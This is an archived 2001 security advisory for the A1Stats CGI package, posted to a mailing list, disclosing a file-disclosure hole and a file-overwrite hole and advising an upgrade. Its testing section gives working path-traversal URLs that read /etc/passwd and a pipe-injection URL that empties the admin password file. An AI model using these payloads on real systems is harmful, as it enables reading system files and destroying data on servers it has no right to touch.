OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: neme-dhcHUSHMAIL.COM
Date: Mon May 07 2001 - 19:31:12 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

     [ Advisory for A1Stats ]
     [ A1Stats is made by Drummond Miles ]
     [ Site: http://www.gadnet.com/a1stats ]
     [ by nemesystm of the DHC ]
     [ (http://dhcorp.cjb.net - neme-dhchushmail.com) ]
     [ ADV-0114 ]

    /-|=[explanation]=|-\
    A1Stats is a CGI package to track website traffic.
    The package has a view files bug and also gives the
    possibility to overwrite existing files.

    /-|=[who is vulnerable]=|-\
    Anyone using a A1Stats that was downloaded before
    24/04/01.

    /-|=[testing it]=|-\
    To test these vulnerabilities, try the following.
    www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
    www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
    These two will give you /etc/passwd.
    www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd
    This will also give you /etc/passwd but it will
    show it in a very mangled manner as the CGI adds
    HTML tags to what it thinks is a file it created
    itself.

    One can also open a file and wreck its contents.
    http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|
    will empty a1admin.txt. a1admin.txt contains the
    password to change settings of the CGI. When this
    file is removed, no one can log in anymore.

    /-|=[fix]=|-\
    Downloading the latest version will solve this
    problem.
    Free, encrypted, secure Web-based email at www.hushmail.com